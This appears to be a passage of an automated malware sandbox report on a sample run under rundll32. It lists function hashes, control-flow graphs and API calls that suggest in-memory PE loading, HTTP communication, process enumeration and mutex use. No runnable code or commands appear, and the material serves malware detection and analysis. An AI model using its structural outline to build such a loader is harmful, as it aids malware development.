                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
                                                                                                                                                                                                                                                                      • Instruction ID: d5794b4ae4398bd8da8318b26779c3da0ec68c91b575466ea4b8ec199c0f23d8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9511EF70158F4D4BF760EE18A8463BB72C0FB98314F50053DE889C22D1DBF5564A8693
                                                                                                                                                                                                                                                                      Function 000001FF4CB04FF0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
                                                                                                                                                                                                                                                                      • Instruction ID: ce8f76b83b438981e6064ef777d9c8059b31ba36e7d79e1769ae9748ea065485
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA11A730618F468FEB149F489846BFA77E4FB49711F40443EE489C2AA0D6759841CAC7
                                                                                                                                                                                                                                                                      Function 000001FF4CB04740 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                                                                                                                                                                                                                      • Instruction ID: 971e4978c328ef59b890bf0ef42f310a8eb849255487e77a967f24e2c5ad0241
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F01C430628F064FE748AB1894173F773E1FB99711F10557EE449C36A2D6A5D9418E83
                                                                                                                                                                                                                                                                      Function 000001FF4C9CD9FE Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2100231573.000001FF4C990000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4C990000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_1ff4c990000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                                                                      • Instruction ID: 0572d7f0b80f9af12a14c9913ded387302c0da89d38a177be0de80c424946096
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F0A4B0628B408BE744DF1884CA6767BE1FBD8745F24453EE989C7361CB3198828B43
                                                                                                                                                                                                                                                                      Function 000001FF4C9CD98E Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2100231573.000001FF4C990000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4C990000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_1ff4c990000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                                                                      • Instruction ID: 08ddfeeb2b1022a96227b6974a48b1fb8066a2ff9b268f9d7d293fdf3a95076f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DF0A4B0618B448BE744DF1884C967677E1FBD8755F24453EE999C7361CB319842CB43
                                                                                                                                                                                                                                                                      Function 000001FF4C9CDA6E Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2100231573.000001FF4C990000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4C990000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_1ff4c990000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                                                                      • Instruction ID: 596b7c314ef086b00ecb35e7abf91b3343d535ab1ce2f170ab7b7a1dc3bb7cba
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F09070A28F044BD704AE28884A67637E2FBA8745F54063EA448C7361CB35A4428A43
                                                                                                                                                                                                                                                                      Function 000001FF4CAE8149 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                                                                                                                                      • Instruction ID: 976508a2ef811da7e51f1c5a4127f85864e7fbe82eddd40f0119c12b8a978c98
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31D0A77248DB194DE7209A98F8473F5B3D0FB81324F40443EC18CC1443D67E40464706
                                                                                                                                                                                                                                                                      Function 000001FF4B0A2050 Relevance: 22.8, APIs: 15, Instructions: 324COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 74 1ff4b0a2050-1ff4b0a209a call 1ff4b0a1340 77 1ff4b0a209c-1ff4b0a209e 74->77 78 1ff4b0a20a3-1ff4b0a20bd 74->78 79 1ff4b0a2640-1ff4b0a2647 77->79 80 1ff4b0a20d1-1ff4b0a20fa call 1ff4b0a1340 78->80 81 1ff4b0a20bf-1ff4b0a20cc SetLastError 78->81 84 1ff4b0a20fc-1ff4b0a20fe 80->84 85 1ff4b0a2103-1ff4b0a212a 80->85 81->79 84->79 86 1ff4b0a213e-1ff4b0a214c 85->86 87 1ff4b0a212c-1ff4b0a2139 SetLastError 85->87 88 1ff4b0a214e-1ff4b0a215b SetLastError 86->88 89 1ff4b0a2160-1ff4b0a216d 86->89 87->79 88->79 90 1ff4b0a2181-1ff4b0a21b1 89->90 91 1ff4b0a216f-1ff4b0a217c SetLastError 89->91 92 1ff4b0a21cb-1ff4b0a21d8 90->92 91->79 93 1ff4b0a21da-1ff4b0a21e3 92->93 94 1ff4b0a222b-1ff4b0a2286 GetNativeSystemInfo 92->94 95 1ff4b0a21fc-1ff4b0a220e 93->95 96 1ff4b0a21e5-1ff4b0a21fa 93->96 97 1ff4b0a229a-1ff4b0a22c5 VirtualAlloc 94->97 98 1ff4b0a2288-1ff4b0a2295 SetLastError 94->98 99 1ff4b0a2213-1ff4b0a221d 95->99 96->99 100 1ff4b0a22c7-1ff4b0a22eb VirtualAlloc 97->100 101 1ff4b0a22ff-1ff4b0a2324 GetProcessHeap HeapAlloc 97->101 98->79 102 1ff4b0a2229 99->102 103 1ff4b0a221f-1ff4b0a2224 99->103 100->101 104 1ff4b0a22ed-1ff4b0a22fa SetLastError 100->104 105 1ff4b0a234b-1ff4b0a2369 101->105 106 1ff4b0a2326-1ff4b0a2346 VirtualFree SetLastError 101->106 102->92 103->102 104->79 108 1ff4b0a236b-1ff4b0a2373 105->108 109 1ff4b0a2375 105->109 106->79 110 1ff4b0a237d-1ff4b0a23fe call 1ff4b0a1340 108->110 109->110 113 1ff4b0a240a-1ff4b0a24a7 VirtualAlloc call 1ff4b0a1120 call 1ff4b0a1380 110->113 114 1ff4b0a2400 110->114 121 1ff4b0a24ac-1ff4b0a24ae 113->121 115 1ff4b0a262c-1ff4b0a263e call 1ff4b0a28e0 114->115 115->79 122 1ff4b0a24ba-1ff4b0a24e3 121->122 123 1ff4b0a24b0 121->123 124 1ff4b0a2509-1ff4b0a250e 122->124 125 1ff4b0a24e5-1ff4b0a2507 call 1ff4b0a1ab0 122->125 123->115 127 1ff4b0a2515-1ff4b0a2529 call 1ff4b0a1c80 124->127 125->127 131 1ff4b0a252b 127->131 132 1ff4b0a2535-1ff4b0a2549 call 1ff4b0a1790 127->132 131->115 135 1ff4b0a254b 132->135 136 1ff4b0a2555-1ff4b0a2569 call 1ff4b0a19f0 132->136 135->115 139 1ff4b0a256b 136->139 140 1ff4b0a2575-1ff4b0a2581 136->140 139->115 141 1ff4b0a2587-1ff4b0a2590 140->141 142 1ff4b0a2618-1ff4b0a261d 140->142 144 1ff4b0a25f7-1ff4b0a2612 141->144 145 1ff4b0a2592-1ff4b0a25d8 141->145 143 1ff4b0a2625-1ff4b0a262a 142->143 143->79 143->115 146 1ff4b0a2616 144->146 148 1ff4b0a25e9-1ff4b0a25f5 145->148 149 1ff4b0a25da-1ff4b0a25e5 SetLastError 145->149 146->143 148->146 149->115
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                      • Opcode ID: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                                                                                                                                                                      • Instruction ID: 6218cd995dfbabc1f082e65d7df9272eabffc32ec4dce8c70c0e40effe67b034
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15F1EC37219B89C6DB608B19E4907ABB7A0F79CB81F145439EB8E83B65DF78C445CB00
                                                                                                                                                                                                                                                                      Function 000001FF4CAD7830 Relevance: 9.3, APIs: 6, Instructions: 340networkCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 225 1ff4cad7830-1ff4cad7883 226 1ff4cad788a-1ff4cad7892 InternetOpenW 225->226 227 1ff4cad7885-1ff4cad7888 225->227 228 1ff4cad7898-1ff4cad78d7 InternetConnectW 226->228 229 1ff4cad7af9-1ff4cad7afd 226->229 227->226 228->229 230 1ff4cad78dd-1ff4cad792b HttpOpenRequestW 228->230 231 1ff4cad7aff-1ff4cad7b0c 229->231 230->231 232 1ff4cad7931-1ff4cad793b 230->232 233 1ff4cad7b0e-1ff4cad7b11 InternetCloseHandle 231->233 234 1ff4cad7b17-1ff4cad7b1a 231->234 235 1ff4cad793d-1ff4cad7945 232->235 236 1ff4cad7990-1ff4cad79ab 232->236 233->234 237 1ff4cad7b1c-1ff4cad7b1d 234->237 238 1ff4cad7b25-1ff4cad7b28 234->238 235->236 239 1ff4cad7947-1ff4cad798b call 1ff4cb02750 * 2 235->239 236->231 249 1ff4cad79b1-1ff4cad79ba 236->249 237->238 240 1ff4cad7b2a-1ff4cad7b2b 238->240 241 1ff4cad7b33-1ff4cad7b3b 238->241 239->236 240->241 243 1ff4cad7bd0-1ff4cad7be3 241->243 244 1ff4cad7b41-1ff4cad7b4b 241->244 247 1ff4cad7b4d-1ff4cad7b54 call 1ff4cb01230 244->247 248 1ff4cad7b62-1ff4cad7b73 244->248 247->248 263 1ff4cad7b56-1ff4cad7b60 call 1ff4cafb4e0 247->263 250 1ff4cad7b7a-1ff4cad7b8a call 1ff4cadcb60 248->250 251 1ff4cad7b75-1ff4cad7b78 248->251 253 1ff4cad79bc-1ff4cad79de call 1ff4cb01270 HttpSendRequestA 249->253 254 1ff4cad79e6-1ff4cad7a0a 249->254 265 1ff4cad7b8c-1ff4cad7bb8 call 1ff4cada050 call 1ff4cafb4e0 250->265 266 1ff4cad7bba-1ff4cad7bce call 1ff4cb01410 250->266 251->243 251->250 253->231 264 1ff4cad79e4-1ff4cad7a16 253->264 267 1ff4cad7a0c 254->267 263->243 275 1ff4cad7a18-1ff4cad7a1f call 1ff4cafb4e0 264->275 276 1ff4cad7a24-1ff4cad7a3b call 1ff4cafb4c0 264->276 265->243 266->243 266->263 267->253 275->276 283 1ff4cad7a3f-1ff4cad7a5b InternetQueryDataAvailable 276->283 284 1ff4cad7ae3-1ff4cad7af7 call 1ff4cafb4e0 283->284 285 1ff4cad7a61-1ff4cad7a69 283->285 284->233 285->284 287 1ff4cad7a6b-1ff4cad7a7e 285->287 287->284 290 1ff4cad7a80-1ff4cad7a86 287->290 290->284 291 1ff4cad7a88-1ff4cad7a96 290->291 292 1ff4cad7aac-1ff4cad7aaf call 1ff4cafb4c0 291->292 293 1ff4cad7a98-1ff4cad7aaa 291->293 296 1ff4cad7ab4-1ff4cad7ade call 1ff4caf44a0 292->296 293->296 296->283
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Internet$HttpOpenRequest$AvailableCloseConnectDataFreeHandleHeapQuerySend
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3768145577-0
                                                                                                                                                                                                                                                                      • Opcode ID: b511c7863b3ab9a59219a4b3e63d03ff5358a22e987fa0d3a10f99e9fec2f975
                                                                                                                                                                                                                                                                      • Instruction ID: cebdfc696437e6c89b0340949d514d415a6916ae9c79afebccffe16837d1f81f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b511c7863b3ab9a59219a4b3e63d03ff5358a22e987fa0d3a10f99e9fec2f975
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8B1A530218E0A8BE758DB18E8657BBB3E6FF94300F4415BDA446C7295DFB4D8428792
                                                                                                                                                                                                                                                                      Function 000001FF4C9CCABE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 323COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2100231573.000001FF4C990000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4C990000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_1ff4c990000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID: 0$@$@$`
                                                                                                                                                                                                                                                                      • API String ID: 0-307318802
                                                                                                                                                                                                                                                                      • Opcode ID: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                                                                      • Instruction ID: 386701b9c4ad2a39a23276fa2aaf34c9085106f1f5bf8f95c032a498f8f00254
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19B12A7061CB488FD7A4EF18D845BEAB7E0FB98714F104A6EE48DC3291DB74D9458B82
                                                                                                                                                                                                                                                                      Function 000001FF4C9CBE8E Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 317COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2100231573.000001FF4C990000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4C990000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_1ff4c990000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                      • Opcode ID: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                                                                      • Instruction ID: ad075047989c3af1a4ec1c772cb0ce94a37660b566381b29d1c994ef185a9a90
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37B17E31218E088FDB54EF1DC885BAABBE1FF98310F50466EE489C7251DB74E945CB82
                                                                                                                                                                                                                                                                      Function 000001FF4CAE8C60 Relevance: 3.2, APIs: 2, Instructions: 188COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Fiber$CreateDelete
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2527733159-0
                                                                                                                                                                                                                                                                      • Opcode ID: a81c3d8a98be896dd9ba18f06cc8f029549e5d5c5a40f868ab439c78b2d98936
                                                                                                                                                                                                                                                                      • Instruction ID: 621590924576829e6efdd3473b3a3de129448aa4075aa87798427206b4ff0ee2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a81c3d8a98be896dd9ba18f06cc8f029549e5d5c5a40f868ab439c78b2d98936
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F51D530618D154BE768BB2CA85A7B673D1FB58310F20167DE89AC31E1DA649C03C6D2
                                                                                                                                                                                                                                                                      Function 000001FF4B0A15E0 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 384 1ff4b0a15e0-1ff4b0a15fc 385 1ff4b0a1608-1ff4b0a1617 384->385 386 1ff4b0a15fe-1ff4b0a1603 384->386 388 1ff4b0a1619-1ff4b0a162a 385->388 389 1ff4b0a168c-1ff4b0a169b 385->389 387 1ff4b0a1784-1ff4b0a1788 386->387 392 1ff4b0a162c-1ff4b0a1635 388->392 393 1ff4b0a1682-1ff4b0a1687 388->393 390 1ff4b0a16a7 389->390 391 1ff4b0a169d-1ff4b0a16a5 389->391 394 1ff4b0a16af-1ff4b0a16c6 390->394 391->394 395 1ff4b0a1637-1ff4b0a164a 392->395 396 1ff4b0a1664-1ff4b0a167c VirtualFree 392->396 393->387 397 1ff4b0a16c8-1ff4b0a16d0 394->397 398 1ff4b0a16d2 394->398 395->396 399 1ff4b0a164c-1ff4b0a1662 395->399 396->393 400 1ff4b0a16da-1ff4b0a16f1 397->400 398->400 399->393 399->396 401 1ff4b0a16fd 400->401 402 1ff4b0a16f3-1ff4b0a16fb 400->402 403 1ff4b0a1705-1ff4b0a1747 401->403 402->403 404 1ff4b0a1749-1ff4b0a1751 403->404 405 1ff4b0a1755-1ff4b0a1779 VirtualProtect 403->405 404->405 406 1ff4b0a177b-1ff4b0a177d 405->406 407 1ff4b0a177f 405->407 406->387 407->387
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                      • Opcode ID: 75ce38d37ca8cf5b7d06ded007de5ea175a415d9990679de99291eeea22f5aae
                                                                                                                                                                                                                                                                      • Instruction ID: 5a83c5ab05cee1c7ca4d4e455f1847183a59f8df054b8253cdf5b2a9690f84c5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce38d37ca8cf5b7d06ded007de5ea175a415d9990679de99291eeea22f5aae
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A51E8772087498BEB60CF1AE09076BB7A1F7D9B85F084429EB8D87764DB78D951CB00
                                                                                                                                                                                                                                                                      Function 00007DF459570000 Relevance: 3.1, APIs: 2, Instructions: 88processCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2476801129.00007DF459570000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF459570000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_7df459570000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3280610774-0
                                                                                                                                                                                                                                                                      • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                                                                                                      • Instruction ID: e4be21fc8f3a31bf69686a896177be1d3a99fab218a27e6d591dc2c4ca804d74
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E21BC3161494C8FEBA1EB6CC858BEE33F1EB98324F404226D81EDB390DF35AA548750
                                                                                                                                                                                                                                                                      Function 000001FF4B0A1380 Relevance: 2.6, APIs: 2, Instructions: 119memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                      • Opcode ID: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                                                                                                                                                                      • Instruction ID: 034058dcfac0be73e41e1ce4e32a0b78802e9ba4219920122c8c9e2249a0ebd9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9451F976618B44C6CB60CB1AE48066AB7A0F7DCBD9F045529EF8E83B69DB78C551CF00
                                                                                                                                                                                                                                                                      Function 000001FF4CAD8ED0 Relevance: 1.9, APIs: 1, Instructions: 410synchronizationCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateMutex
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1964310414-0
                                                                                                                                                                                                                                                                      • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                                                                                                                                      • Instruction ID: 6862be4e439ccb645563a6e5f29d30fd4cadaef51fe3b6c6d1067ab883b70bcc
